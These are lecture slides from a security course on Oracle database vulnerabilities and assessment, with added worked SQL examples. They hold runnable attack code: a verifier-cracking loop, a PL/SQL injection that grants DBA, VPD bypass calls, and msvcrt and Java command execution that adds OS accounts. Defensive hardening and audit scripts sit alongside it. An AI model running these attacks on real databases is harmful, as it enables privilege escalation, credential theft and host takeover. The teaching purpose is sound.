  1. Information System Security: Oracle Vulnerabilities and Security Assessment

  2. Outline
    • Oracle Vulnerabilities
    • Oracle Security Assessment
    Information System Security - Week 10

  4. Ways to attack (diagram)

  5. Outline
    • Oracle Vulnerabilities
      • Users/Passwords
      • PL/SQL injection
      • Running system commands
      • Other vulnerabilities

  6. Users/Passwords
    • TNS protocol
    • How does Oracle authenticate users?
    • Vulnerabilities

  7. TNS protocol (diagram)

  8. TNS protocol (cont)
    • The TNS Listener is the hub of all communications with an Oracle database: every client session starts with a connection to it.
    • Information gathering (listener version, status, registered services) can be done through TNS before any authentication takes place.
    • Exchange in the diagram: the client sends a Connect packet to the listener; the listener answers with Accept or Redirect (or Refuse if the requested service is unknown).

  9. TNS protocol (cont) (diagram)

  10. Authentication process (before 11g)
    1. Client → Server: sends the username.
    2. Server: generates a secret number (the session key) and sends it to the client as AUTH_SESSKEY, encrypted under a key derived from the user's stored password hash, so only a client that knows the password can recover it.
    3. Client: derives the same hash from the password, decrypts AUTH_SESSKEY, encrypts the password with the session key and sends AUTH_PASSWORD.
    4. Server: decrypts AUTH_PASSWORD and compares the result with the password hash from the database.
    5. Authenticated.

  11. How about Oracle 11g?
    1. Client → Server: sends the username.
    2. Server: generates a secret number and sends AUTH_SESSKEY together with AUTH_VFR_DATA (the salt of the user's SHA-1 verifier).
    3. Client: decrypts the server's AUTH_SESSKEY, generates its own AUTH_SESSKEY, combines the two into the session key, encrypts the password with it and sends AUTH_PASSWORD along with its own AUTH_SESSKEY.
    4. Server: decrypts AUTH_PASSWORD and compares the result with the password hash from the database.
    5. Authenticated.

  12. Vulnerabilities
    • Crypto aspect: the verifier can be computed from the password alone, so whoever obtains the password hash can recover the clear-text password offline (dictionary or brute force), without ever talking to the listener again.

  13. Vulnerabilities (cont)
    • Default usernames/passwords (SCOTT/TIGER, SYSTEM/MANAGER, ...).
    • Files containing passwords (installation scripts, configuration files, password files).
    • Brute force, either online against the listener or offline against a captured hash.
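Slide 12's point in working form, as an added example that is not part of the deck: the 11g verifier stored in SYS.USER$.SPARE4 is SHA-1 over the password bytes followed by a 10-byte salt, so anyone holding the "S:" value can test candidates offline. The target verifier, its salt and the candidate list are all constructed inside the block so it runs stand-alone (in an assessment, substitute the SPARE4 value read as a DBA); it assumes EXECUTE on DBMS_CRYPTO and an ASCII password.

```sql
SET SERVEROUTPUT ON

DECLARE
  TYPE t_words IS TABLE OF VARCHAR2(30);

  -- Constructed candidate list; a real run would load a wordlist.
  -- 11g verifiers are case-sensitive, so 'TIGER' and 'tiger' are different candidates.
  v_words  t_words := t_words('manager', 'welcome1', 'TIGER', 'tiger', 'change_on_install');

  -- Assumption: salt and target are built here so the block is self-contained.
  -- In an assessment take the value from
  --   SELECT spare4 FROM sys.user$ WHERE name = 'SCOTT';   (needs SELECT on SYS.USER$)
  v_salt   RAW(10) := HEXTORAW('0123456789ABCDEF0123');
  v_target VARCHAR2(200);

  -- 11g verifier layout: 'S:' || hex(SHA1(password || salt)) || hex(salt)
  FUNCTION verifier_11g (p_password IN VARCHAR2, p_salt IN RAW) RETURN VARCHAR2 IS
    v_digest RAW(20);
  BEGIN
    v_digest := DBMS_CRYPTO.HASH(
                  UTL_RAW.CONCAT(UTL_RAW.CAST_TO_RAW(p_password), p_salt),
                  DBMS_CRYPTO.HASH_SH1);
    RETURN 'S:' || RAWTOHEX(v_digest) || RAWTOHEX(p_salt);
  END verifier_11g;

  -- Dictionary check: recover the salt from the stored value, hash every
  -- candidate with it and compare. Returns the password or NULL.
  FUNCTION crack_11g (p_spare4 IN VARCHAR2, p_words IN t_words) RETURN VARCHAR2 IS
    v_stored VARCHAR2(62) := SUBSTR(p_spare4, 1, 62);  -- drops a 12c ';H:...' suffix if present
    v_salt   RAW(10);
  BEGIN
    IF SUBSTR(v_stored, 1, 2) <> 'S:' THEN
      RETURN NULL;  -- only the SHA-1 verifier is handled here
    END IF;
    v_salt := HEXTORAW(SUBSTR(v_stored, 43, 20));  -- last 20 hex digits = 10-byte salt
    FOR i IN 1 .. p_words.COUNT LOOP
      IF verifier_11g(p_words(i), v_salt) = v_stored THEN
        RETURN p_words(i);
      END IF;
    END LOOP;
    RETURN NULL;
  END crack_11g;
BEGIN
  -- what the server would have stored for password 'tiger' with this salt
  v_target := verifier_11g('tiger', v_salt);
  DBMS_OUTPUT.PUT_LINE('Stored verifier : ' || v_target);
  DBMS_OUTPUT.PUT_LINE('Recovered       : ' ||
                       NVL(crack_11g(v_target, v_words), '<not in candidate list>'));
END;
/
```

The loop is deliberately naive; the point is that nothing slows it down. Each guess costs one SHA-1, there is no iteration count, and the salt only prevents precomputed tables, which is why the password policy and the protection of SYS.USER$ (and of exports that contain it) matter more than the hash algorithm.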

  14. PL/SQL Injection
    • Introduction
    • Procedures, functions
    • Triggers
    • VPD

  15. Introduction
    • PL/SQL is the procedural programming language built into Oracle; it extends SQL.
    • It can call external libraries (C) and Java.
    • Used to create procedures, functions, triggers, packages...

  16. Introduction (cont)
    • Execution privileges:
      • Definer rights (the default): the code runs with the privileges of its owner.
      • Invoker rights: keyword AUTHID CURRENT_USER; the code runs with the caller's privileges.
    • PL/SQL can be wrapped (obfuscated), so an attacker may have to work without source. DESCRIBE still shows a procedure's parameters, which is enough to start probing them.

  17. Procedures
    • Similar to SQL injection: user input is concatenated into dynamic SQL inside a procedure.
    • PL/SQL injection can occur with a statement like this:
        SELECT * FROM table_name WHERE id = 'USER_INPUT'
      which crafted input turns into:
        SELECT * FROM table_name WHERE id = 'XXX' UNION SELECT ....

  18. Procedures (cont)
    • Inject a call to an attacker-owned function into the PL/SQL statement.
    • Keyword: PRAGMA AUTONOMOUS_TRANSACTION lets that function execute DML or DDL (e.g. a GRANT) even though it is invoked from a SELECT.
    • The injected code takes on whatever rights the vulnerable procedure runs with: a definer-rights procedure owned by SYS or a DBA executes the attacker's function with those privileges.
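The attack described on slides 17 and 18 carried through end to end, as an added worked example that is not from the deck. APPOWNER, SCOTT, get_user_info and escalate are assumed names; APPOWNER is assumed to hold GRANT ANY ROLE as a direct grant, because roles are disabled inside definer-rights code and a DBA role alone would not be usable there.

```sql
-- Setup (as SYS): the privileged owner and the low-privileged attacker.
GRANT GRANT ANY ROLE TO appowner;           -- direct grant: roles are disabled in definer-rights code
GRANT CREATE SESSION, CREATE PROCEDURE TO scott;

-- Vulnerable procedure: definer rights (the default), executable by PUBLIC,
-- caller input concatenated straight into the SQL text (the pattern of slide 17).
CREATE OR REPLACE PROCEDURE appowner.get_user_info (p_username IN VARCHAR2)
AUTHID DEFINER
IS
  TYPE t_cur IS REF CURSOR;
  v_cur  t_cur;
  v_name VARCHAR2(128);
BEGIN
  OPEN v_cur FOR
    'SELECT username FROM all_users WHERE username = ''' || p_username || '''';
  LOOP
    FETCH v_cur INTO v_name;
    EXIT WHEN v_cur%NOTFOUND;
    DBMS_OUTPUT.PUT_LINE(v_name);
  END LOOP;
  CLOSE v_cur;
END;
/
GRANT EXECUTE ON appowner.get_user_info TO PUBLIC;

-- Attacker (SCOTT). AUTHID CURRENT_USER: called from the definer-rights procedure,
-- the current user is APPOWNER, so the GRANT runs with APPOWNER's privileges.
-- PRAGMA AUTONOMOUS_TRANSACTION: a function called from a SELECT may not otherwise
-- perform DML or DDL; the autonomous transaction lifts that restriction.
CREATE OR REPLACE FUNCTION scott.escalate RETURN VARCHAR2
AUTHID CURRENT_USER
IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
  COMMIT;
  RETURN 'X';
END;
/
GRANT EXECUTE ON scott.escalate TO PUBLIC;

-- The injection: close the literal, UNION in a call to the function, comment out
-- the trailing quote. The statement the procedure actually executes becomes
--   SELECT username FROM all_users WHERE username = 'X'
--   UNION SELECT scott.escalate() FROM dual--'
EXEC appowner.get_user_info('X'' UNION SELECT scott.escalate() FROM dual--');
-- SCOTT now holds DBA (reconnect and check SESSION_ROLES).

-- Hardened version: bind the value instead of concatenating it, and run with the
-- caller's privileges so an injected call would gain nothing even if one got through.
CREATE OR REPLACE PROCEDURE appowner.get_user_info (p_username IN VARCHAR2)
AUTHID CURRENT_USER
IS
  TYPE t_cur IS REF CURSOR;
  v_cur  t_cur;
  v_name VARCHAR2(128);
BEGIN
  OPEN v_cur FOR
    'SELECT username FROM all_users WHERE username = :u' USING p_username;
  LOOP
    FETCH v_cur INTO v_name;
    EXIT WHEN v_cur%NOTFOUND;
    DBMS_OUTPUT.PUT_LINE(v_name);
  END LOOP;
  CLOSE v_cur;
END;
/
-- Where a value has to become part of the SQL text (an object name, say), pass it
-- through DBMS_ASSERT.SIMPLE_SQL_NAME or DBMS_ASSERT.ENQUOTE_LITERAL first.
```

The same construction works against a trigger (slide 19): a trigger that builds dynamic SQL from the :NEW values of the row being inserted is injected by the INSERT statement that fires it, and since triggers always run with their owner's rights the escalation path is identical.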

  19. Triggers
    • Similar to procedure/function injection: a trigger body that builds dynamic SQL from the values of the row being modified is injected by the statement that fires it.
    • Note: triggers always run with definer rights (the privileges of the trigger owner).
    • Some real-world examples:
      • MDSYS.SDO_DROP_USER_BEFORE
      • MDSYS.SDO_GEOM_TRIG_INS1

  20. VPD
    • Virtual Private Database is based on a policy function that returns a predicate, which Oracle appends to every statement on the protected table.
    • It can be defeated through PL/SQL injection that drops the policy (DBMS_RLS.DROP_POLICY)...
    • ...or that grants the attacker the EXEMPT ACCESS POLICY privilege, which bypasses every policy in the database.
    • Another way to defeat VPD is reading the raw datafile, where no policy applies → hard.
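A minimal VPD setup and the checks an assessor runs against it, as an added example that is not from the deck. APPOWNER, the ORDERS table, its OWNER column and the policy names are assumed; the dictionary views are the standard ones.

```sql
-- Policy function: receives (schema, object) and returns the predicate string that
-- Oracle appends to every statement on the protected table.
CREATE OR REPLACE FUNCTION appowner.orders_policy (
  p_schema IN VARCHAR2,
  p_object IN VARCHAR2) RETURN VARCHAR2
IS
BEGIN
  -- each session sees only the rows whose OWNER column matches the logged-in user
  RETURN 'owner = SYS_CONTEXT(''USERENV'', ''SESSION_USER'')';
END orders_policy;
/

BEGIN
  DBMS_RLS.ADD_POLICY(
    object_schema   => 'APPOWNER',
    object_name     => 'ORDERS',
    policy_name     => 'ORDERS_BY_OWNER',
    function_schema => 'APPOWNER',
    policy_function => 'ORDERS_POLICY',
    statement_types => 'SELECT, INSERT, UPDATE, DELETE',
    update_check    => TRUE);  -- also apply the predicate to rows written by INSERT/UPDATE
END;
/

-- The two bypasses named on the slide, as they would appear inside an injected
-- function running with a privileged definer's rights (compare slide 18):
--   DBMS_RLS.DROP_POLICY('APPOWNER', 'ORDERS', 'ORDERS_BY_OWNER');
--   EXECUTE IMMEDIATE 'GRANT EXEMPT ACCESS POLICY TO SCOTT';

-- Assessment checks.
-- 1. Which policies exist, which function backs them, and are they enabled?
SELECT object_owner, object_name, policy_name, pf_owner, function, enable
  FROM dba_policies
 ORDER BY object_owner, object_name, policy_name;

-- 2. Who can bypass every policy?
SELECT grantee, admin_option
  FROM dba_sys_privs
 WHERE privilege = 'EXEMPT ACCESS POLICY';

-- 3. Who can add or drop policies? EXECUTE on DBMS_RLS should never reach PUBLIC.
SELECT grantee, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS' AND table_name = 'DBMS_RLS';

-- 4. Who could replace the policy function itself (with one that returns '1=1')?
SELECT grantee
  FROM dba_sys_privs
 WHERE privilege = 'CREATE ANY PROCEDURE';
```

Check 4 is the one most often missed: the policy is only as strong as the function it calls, and CREATE ANY PROCEDURE lets a user rewrite that function without touching DBMS_RLS at all.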

  21. Running System Commands
    • Through PL/SQL
    • Through Java
    • Access file system
    • Access network

  22. Through PL/SQL
    • Register msvcrt.dll as an external library and call its system() function.
    • Requires the CREATE LIBRARY privilege to register the library in Oracle.
    • Newer versions of Oracle only load libraries located under ORACLE_HOME/bin (and ORACLE_HOME/lib), unless EXTPROC_DLLS in listener.ora has been relaxed.

  23. Through PL/SQL (cont)
    -- register the C runtime as an Oracle library (path as on the original slide)
    CREATE OR REPLACE LIBRARY exec_shell AS 'C:\winnt\system32\msvcrt.dll';
    -- call specification: oraexec(cmd) maps onto msvcrt's system(const char *)
    CREATE OR REPLACE PROCEDURE oraexec (cmdstring IN CHAR)
    IS EXTERNAL
      NAME "system"
      LIBRARY exec_shell
      LANGUAGE C;
    -- the command runs as the OS account of the extproc process (normally the Oracle service account)
    EXEC ORAEXEC('NET USER MYACCOUNT PASSWORD /ADD');

  24. Through Java
    • Does not need the CREATE LIBRARY privilege.
    • Requires these Java permissions (granted with DBMS_JAVA.GRANT_PERMISSION):
      • java.io.FilePermission <<ALL FILES>> execute
      • java.lang.RuntimePermission writeFileDescriptor
      • java.lang.RuntimePermission readFileDescriptor

  25. Through Java (cont)
    CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS
    import java.lang.*;
    import java.io.*;
    public class JAVACMD
    {
      public static void execCommand (String command) throws IOException
      {
        Runtime.getRuntime().exec(command);
      }
    };
    /
    -- PL/SQL call specification so the Java method can be invoked from SQL
    CREATE OR REPLACE PROCEDURE javacmd (p_command IN VARCHAR2)
    AS LANGUAGE JAVA NAME 'JAVACMD.execCommand(java.lang.String)';
    /
    -- permissions from the previous slide, granted by SYS to the schema owning JAVACMD (SCOTT assumed)
    EXEC DBMS_JAVA.GRANT_PERMISSION('SCOTT', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute');
    EXEC DBMS_JAVA.GRANT_PERMISSION('SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
    EXEC DBMS_JAVA.GRANT_PERMISSION('SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
    EXEC javacmd('cmd.exe /c net user myaccount password /add');

  26. Other ways
    • Using DBMS_SCHEDULER (external jobs run an OS executable).
    • Using the job scheduler (DBMS_JOB).
    • Using the ALTER SYSTEM statement.

  27. Access File System
    • Use the UTL_FILE package.
    • Needs a privilege on an existing DIRECTORY object, or the CREATE ANY DIRECTORY privilege to create a new one.
    • Using Java is similar to running OS commands: the schema needs java.io.FilePermission with read and write on the target paths.

  28. Access Network
    • Use UTL_TCP or UTL_HTTP.
    • Create a connection to a remote host → transfer data out, or reach hosts behind the database server.

  29. Other Vulnerabilities
    • System configuration parameters:
      • O7_DICTIONARY_ACCESSIBILITY (TRUE lets the ANY privileges, e.g. SELECT ANY TABLE, reach SYS-owned objects)
      • REMOTE_OS_AUTHENT (TRUE trusts the OS username supplied by a remote client)
      • DBLINK_ENCRYPT_LOGIN
      • ...
    • TNS protocol / listener settings (no listener password, remote administration permitted).
    • Application vulnerabilities.

  30. Other Vulnerabilities (cont)
    • Session attack: http://www.youtube.com/watch?v=jjRrLJEbDQU
    • Access control bypass in login: http://www.securityfocus.com/archive/1/422253

  31. Outline
    • Oracle Vulnerabilities
    • Oracle Security Assessment

  32. Oracle Assessment
    • Vulnerability scanning
    • Penetration testing

  33. Vulnerability scanning
    • Looks for evidence of:
      • vulnerable software versions
      • presence or lack of patches
      • misconfiguration

  34. Vulnerability assessment tool
    • Secure Oracle Auditor™ (SOA)

  35. Penetration test
    • A penetration test (pentest) evaluates the security of a computer system or network by simulating an attack from a malicious source.

  36. Penetration test (cont)
    • Stages:
      1. Scope/goal definition
      2. Information gathering
      3. Vulnerability detection
      4. Information analysis and planning
      5. Attack and penetration / privilege escalation
      6. Result analysis and reporting
      7. Cleanup

  37. Information gathering
    • Footprinting: the first and most convenient way attackers gather information.
    • Includes: internet, remote access, extranet...
    • Example: whois hvaonline.net

  38. Information gathering
    • Example (screenshot not included in the transcript)

  39. Attack
    • SQL script

  40. Vulnerability assessment tools
    • AppDetectivePro for Oracle
    • Metasploit

  41. Database Services Countermeasures
    • Remove default accounts, assign strong passwords to the remaining accounts, and enable auditing of failed logins.
    • Keep the databases patched.
    • Reduce privileges: revoke unnecessary grants to PUBLIC, keep every account's privileges to a minimum, and audit access to critical tables and views.

  42. Summary
    • Vulnerabilities usually come from granting inappropriate privileges:
      • CREATE ANY PROCEDURE
      • CREATE ANY TRIGGER
      • CREATE ANY VIEW
      • GRANT something TO PUBLIC
      • ...
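A review script covering the configuration parameters of slide 29, the countermeasures of slide 41 and the privileges of slide 42, as an added example that is not from the deck. It runs as a DBA against the standard data dictionary views; only the last two statements change anything, and they are the countermeasures the deck recommends.

```sql
-- 1. Accounts still using a default password (DBA_USERS_WITH_DEFPWD exists from 11g).
SELECT username FROM dba_users_with_defpwd ORDER BY username;

-- 2. Open accounts and their profiles: default accounts that should be locked show up here.
SELECT username, account_status, profile
  FROM dba_users
 WHERE account_status = 'OPEN'
 ORDER BY username;

-- 3. Holders of the privileges the summary slide names, plus the ones behind the
--    library, directory, VPD and role-grant attacks discussed earlier.
SELECT grantee, privilege, admin_option
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE ANY PROCEDURE', 'CREATE ANY TRIGGER', 'CREATE ANY VIEW',
                     'CREATE LIBRARY', 'CREATE ANY LIBRARY', 'CREATE ANY DIRECTORY',
                     'EXEMPT ACCESS POLICY', 'GRANT ANY ROLE', 'GRANT ANY PRIVILEGE')
 ORDER BY privilege, grantee;

-- 4. Packages executable by PUBLIC that reach the OS, the file system or the network.
SELECT table_name, privilege
  FROM dba_tab_privs
 WHERE grantee = 'PUBLIC'
   AND owner = 'SYS'
   AND table_name IN ('UTL_FILE', 'UTL_TCP', 'UTL_HTTP', 'UTL_SMTP', 'UTL_INADDR',
                      'DBMS_SCHEDULER', 'DBMS_JOB', 'DBMS_JAVA', 'DBMS_RLS')
 ORDER BY table_name;

-- 5. Java permissions that allow OS command execution from Java stored procedures
--    (slide 24). The view exists only when the JVM is installed.
SELECT grantee, type_name, name, action
  FROM dba_java_policy
 WHERE kind = 'GRANT'
   AND (   (type_name = 'java.io.FilePermission'      AND name = '<<ALL FILES>>')
        OR (type_name = 'java.lang.RuntimePermission' AND name IN ('readFileDescriptor', 'writeFileDescriptor')))
 ORDER BY grantee;

-- 6. Parameters from slide 29. Expected: o7_dictionary_accessibility = FALSE,
--    remote_os_authent = FALSE, audit_trail not NONE. dblink_encrypt_login was
--    removed in 10g and returns no row on current versions.
SELECT name, value
  FROM v$parameter
 WHERE name IN ('o7_dictionary_accessibility', 'remote_os_authent',
                'remote_login_passwordfile', 'audit_trail', 'dblink_encrypt_login')
 ORDER BY name;

-- Countermeasures from slide 41: record failed logins, and take the network
-- package back from PUBLIC (repeat for every package flagged by step 4 that the
-- application does not need).
AUDIT CREATE SESSION WHENEVER NOT SUCCESSFUL;
REVOKE EXECUTE ON sys.utl_tcp FROM PUBLIC;
```

Revoking from PUBLIC breaks any application code that relied on the implicit grant, so run step 4 first, map each package to the schemas that actually call it, and grant EXECUTE to those schemas before the REVOKE.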

  43. References
    • David Litchfield, The Oracle Hacker's Handbook
    • David Litchfield et al., The Database Hacker's Handbook
    • http://www.petefinnigan.com/weblog/
    • http://soonerorlater.hu/index.khtml?article_id=512